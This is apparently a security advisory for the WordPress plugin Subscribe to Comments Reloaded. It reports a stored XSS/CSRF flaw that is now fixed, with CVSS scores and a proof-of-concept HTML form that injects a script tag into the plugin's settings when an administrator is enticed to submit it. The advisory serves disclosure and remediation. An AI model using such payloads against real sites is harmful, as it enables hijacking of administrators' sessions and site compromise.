CVSS Summary
| Score | 6.8 Medium | 
|---|---|
| Vector | Network | 
| Complexity | Medium | 
| Authentication | None | 
| Confidentiality | Partial | 
| Integrity | Partial | 
| Availability | Partial | 
Last revised:
This plugin contains a combination XSS/CSRF vulnerability. Because the XSS is stored, browsers like Chrome which implement anti-XSS measures are equally at risk.
Current state: Fixed
| Score | 6.8 Medium | 
|---|---|
| Vector | Network | 
| Complexity | Medium | 
| Authentication | None | 
| Confidentiality | Partial | 
| Integrity | Partial | 
| Availability | Partial | 
Entice an administrative user to submit the following form:
<form action="http://localhost/wp-admin/admin.php?page=subscribe-to-comments-reloaded/options/index.php&subscribepanel=3" method="post"> <input type="text" name="options[manager_page]" id="manager_page" value=""><script>alert(1)</script>"> <input type="submit"> </form>
An alert will be displayed on this plugin’s settings page.
Upgrade immediately.